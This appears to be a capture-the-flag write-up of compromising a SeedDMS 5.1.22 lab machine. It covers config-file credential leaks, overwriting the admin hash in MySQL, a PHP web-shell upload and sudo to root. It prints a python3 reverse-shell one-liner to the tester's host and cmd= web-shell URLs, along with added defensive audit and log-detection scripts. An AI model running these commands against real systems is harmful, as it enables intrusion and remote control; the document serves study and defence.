Write Up

The document details a penetration testing process on a web application running seedDMS 5.1.22, revealing vulnerabilities through enumeration and exploitation. The tester discovers MySQL credentials, gains access to the database, retrieves user credentials, and exploits an RCE vulnerability to obtain a reverse shell. Ultimately, the tester escalates privileges to root by leveraging found credentials and sudo permissions.

Uploaded by

mileri3088

HackmePlease

Ports: 80, 3306, 33060 open
Done or Not: Done
OS: Linux
Services: http, mysql
Tag: seedDMS 5.1.22

Initial Shell: Found a hidden directory commented out in the source of the main.js file and visited it: SeedDMS 5.1.22. Looked in the GitHub repo, found the conf directory and the settings.xml file, tried the same path on this web server and got MySQL creds. Logged in to MySQL, got some user creds and the hash for the admin user; couldn't crack the hash, so updated it and logged in. Searched for an exploit for this version, found one for a slightly older version, tried it, got RCE and a shell.

Root Shell: Switched to another user using creds found in MySQL. sudo -l: (ALL : ALL) ALL. Root.

Tips: Always read main.js and the page source very carefully, line by line. When you meet an unknown CMS, find its GitHub repo and study its directory structure to see whether any interesting files are present (configuration files, settings.xml and the like). If a directory is found, run directory and file busting against that directory on your target.

Enumeration

Nmap scan report for 192.168.29.214


Host is up, received user-set (0.0011s latency).
Scanned at 2023-10-11 20:16:13 EDT for 14s

PORT STATE SERVICE REASON VERSION


80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Welcome to the land of pwnland
| http-methods:
|_ Supported Methods: OPTIONS HEAD GET POST
3306/tcp open mysql syn-ack MySQL 8.0.25-0ubuntu0.20.04.1
33060/tcp open mysqlx? syn-ack

We visited port 80, where this website is running.

HackmePlease 1
We viewed the page source and found that a main.js file is present; we opened it.

In the main.js source we found a comment about an endpoint.

We visited the endpoint
http://192.168.29.214/seeddms51x/seeddms-5.1.22/

and it redirected us to http://192.168.29.214/seeddms51x/seeddms-5.1.22/out/out.Login.php?referuri=%2Fseeddms51x%2Fseeddms-5.1.22%2Fout%2Fout.ViewFolder.php

SeedDMS is running here, and the URI also tells us that this is SeedDMS 5.1.22.

We were redirected to the login portal.

We tried default credentials such as admin/admin; they didn't work.


Then we searched for the GitHub repository to see its directory structure.

A settings.xml.template file is present in the conf directory, so a settings.xml file may also exist on the target.

Since nmap showed MySQL running (and as a general habit), we searched this page for "pass", "passwd" and "password" to see whether any credentials were present.

We found MySQL credentials.

Using these credentials we logged in to MySQL:


┌──(kali kali)-[~/Desktop/PGPractice/HackmePlease]
└─$ mysql -h $ip -u seeddms -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 8
Server version: 8.0.25-0ubuntu0.20.04.1 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> show databases;


+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| seeddms |
| sys |
+--------------------+
5 rows in set (0.014 sec)

MySQL [(none)]>

From the seeddms database we found some credentials:

MySQL [(none)]> use seeddms


Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [seeddms]> show tables;
+------------------------------+
| Tables_in_seeddms |
+------------------------------+
| tblACLs |
<SNIP>
| tblWorkflows |
| users |
+------------------------------+
43 rows in set (0.002 sec)

MySQL [seeddms]> select * from users;


+-------------+---------------------+--------------------+-----------------+
| Employee_id | Employee_first_name | Employee_last_name | Employee_passwd |
+-------------+---------------------+--------------------+-----------------+
| 1 | saket | saurav | Saket@#$1337 |
+-------------+---------------------+--------------------+-----------------+
1 row in set (0.001 sec)

MySQL [seeddms]>

We also found login credentials for the admin user:

MySQL [seeddms]> select * from tblUsers;


+----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+----
| id | login | pwd | fullName | email | language | theme | comment | role | hidden | pwd
+----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+----
| 1 | admin | f9ef2c539bad8a6d2f3432b6d49ab51a | Administrator | [email protected] | en_GB | | | 1 | 0 | 202
| 2 | guest | NULL | Guest User | NULL | | | | 2 | 0 | NUL
+----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+----
2 rows in set (0.001 sec)

It looks like an MD5 hash.
We tried to crack this hash, but failed.
However, we can update the value: since it appears to be an unsalted MD5 hash, we can generate our own hash and overwrite the present pwd hash.

MySQL [seeddms]> update tblUsers set pwd='21232f297a57a5a743894a0e4a801fc3' where id='1';


Query OK, 1 row affected (0.003 sec)
Rows matched: 1 Changed: 1 Warnings: 0

MySQL [seeddms]> select * from tblUsers;


+----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+----
| id | login | pwd | fullName | email | language | theme | comment | role | hidden | pwd
+----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+----
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 | Administrator | [email protected] | en_GB | | | 1 | 0 | 202
| 2 | guest | NULL | Guest User | NULL | | | | 2 | 0 | NUL
+----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+----
2 rows in set (0.001 sec)

MySQL [seeddms]>

Now we can log in as admin / admin.
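
The hash swap above works because tblUsers.pwd is a bare, unsalted MD5 of the password. As an added defender-side example (not part of the original writeup), the script below audits rows shaped like the tblUsers output: it flags unsalted MD5 hashes that match a small constructed wordlist, and compares a trusted snapshot of the pwd column against the current one so that a direct UPDATE like the one above stands out. The row data, the wordlist and the baseline snapshot are constructed for this example.

```python
"""Audit SeedDMS tblUsers password hashes (constructed example for this writeup)."""
import hashlib
import re

MD5_HEX = re.compile(r"^[0-9a-f]{32}$", re.I)
# Tiny constructed wordlist; a real audit would use a much larger one.
WEAK_PASSWORDS = ("admin", "password", "123456")


def md5_hex(password):
    """Unsalted MD5 hex digest, exactly what SeedDMS stores in tblUsers.pwd."""
    return hashlib.md5(password.encode()).hexdigest()


def weak_md5_logins(rows):
    """Return (login, password) pairs whose stored hash is the MD5 of a weak password."""
    table = {md5_hex(p): p for p in WEAK_PASSWORDS}
    hits = []
    for row in rows:
        pwd = row["pwd"]
        if pwd and MD5_HEX.match(pwd) and pwd.lower() in table:
            hits.append((row["login"], table[pwd.lower()]))
    return hits


def changed_pwd_logins(baseline, current):
    """Logins whose pwd hash differs from a trusted snapshot.

    A password change made through the application is expected; a change that
    the application never logged (a direct UPDATE on the table) is not."""
    base = {r["login"]: r["pwd"] for r in baseline}
    return [r["login"] for r in current if base.get(r["login"]) != r["pwd"]]


# Constructed snapshot before the database was touched (admin hash as on the page).
BASELINE = [
    {"login": "admin", "pwd": "f9ef2c539bad8a6d2f3432b6d49ab51a"},
    {"login": "guest", "pwd": None},
]
# Constructed snapshot after the UPDATE shown above.
CURRENT = [
    {"login": "admin", "pwd": "21232f297a57a5a743894a0e4a801fc3"},
    {"login": "guest", "pwd": None},
]

if __name__ == "__main__":
    print("weak hashes:", weak_md5_logins(CURRENT))              # [('admin', 'admin')]
    print("changed hashes:", changed_pwd_logins(BASELINE, CURRENT))  # ['admin']
```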

We have an exploit for SeedDMS versions < 5.1.11, and this is 5.1.22; maybe this version is also affected by the same exploit.

https://www.exploit-db.com/exploits/47022

We followed the exploit's instructions to exploit this application.

We scrolled down and clicked on Add Document.

We were redirected to a blank page; the upload seemed successful.

We went to the home page and saw that our cmd.php is present; hovering the mouse cursor over it shows the document id.

Alternatively, we can click on cmd.php to see the document id.

But while the document id is present, cmd.php isn't there; maybe it was uploaded under a different name.

From Exploit-DB we saw that, during execution, the author used 1.php as the name.

We tried the same.

So our cmd.php was renamed to 1.php.
Now we can execute system commands:

http://192.168.29.214/seeddms51x/data/1048576/4/1.php?cmd=id

We can see the result of the id command displayed.

We also saw that python3 is present:

http://192.168.29.214/seeddms51x/data/1048576/4/1.php?cmd=which python3

We used this python3 reverse shell:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.29.29",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

and set up our listener:

nc -nlvp 80

and visited this URL:

http://192.168.29.214/seeddms51x/data/1048576/4/1.php?cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.29.29",80));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

and we got a reverse shell.
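
The requests above (a PHP file served out of the SeedDMS data directory with a cmd= parameter) are exactly what a defender should be looking for in the web server's access log. As an added example that is not part of the original writeup, the script below parses Apache combined-log lines and flags any PHP-family script requested beneath the numbered document-store directories, rating it high when a cmd= parameter is present. The sample log lines are constructed to mirror the requests in this writeup; the folderid parameter and the 1.pdf download are constructed too.

```python
"""Detect web-shell use against a SeedDMS document store in Apache access logs.

Constructed defender-side example for this writeup. Uploaded documents live
under .../data/<n>/<docid>/ and should only ever be downloaded, never executed.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Apache combined log: client, timestamp, request line, status (remainder ignored).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A script file served out of the numbered document-store directories.
STORE_SCRIPT_RE = re.compile(r'/data/\d+/\d+/[^/?]+\.(?:php\d?|phtml|phar)$', re.I)


def analyse_line(line):
    """Return a finding dict for a suspicious request, or None for benign lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = urlsplit(m.group("target"))
    if not STORE_SCRIPT_RE.search(target.path):
        return None
    cmd = parse_qs(target.query).get("cmd", [None])[0]  # parse_qs URL-decodes
    return {
        "src": m.group("src"),
        "time": m.group("ts"),
        "path": target.path,
        "status": int(m.group("status")),
        "cmd": cmd,
        "severity": "high" if cmd else "medium",
    }


def scan(lines):
    """Run analyse_line over an iterable of log lines, keeping only findings."""
    return [f for f in map(analyse_line, lines) if f]


# Constructed sample log mirroring the requests made in this writeup.
SAMPLE_LOG = [
    '192.168.29.29 - - [11/Oct/2023:20:40:01 -0400] "GET /seeddms51x/seeddms-5.1.22/out/out.ViewFolder.php?folderid=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.168.29.29 - - [11/Oct/2023:20:41:15 -0400] "GET /seeddms51x/data/1048576/4/1.php?cmd=id HTTP/1.1" 200 60 "-" "Mozilla/5.0"',
    '192.168.29.29 - - [11/Oct/2023:20:42:30 -0400] "GET /seeddms51x/data/1048576/4/1.php?cmd=which%20python3 HTTP/1.1" 200 20 "-" "Mozilla/5.0"',
    '192.168.29.29 - - [11/Oct/2023:20:43:00 -0400] "GET /seeddms51x/data/1048576/3/1.pdf HTTP/1.1" 200 81920 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```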

We switched to user saket using the found credential Saket@#$1337:

www-data@ubuntu:/home$ su saket
Password:
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

saket@ubuntu:/home$

We ran sudo -l and saw that we can run any command as root.
We then ran sudo -i and got a root shell:

saket@ubuntu:/home$ sudo -l
[sudo] password for saket:
Matching Defaults entries for saket on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User saket may run the following commands on ubuntu:


(ALL : ALL) ALL
saket@ubuntu:/home$ sudo -i
root@ubuntu:~# su root
root@ubuntu:~# whoami && id
root
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~#
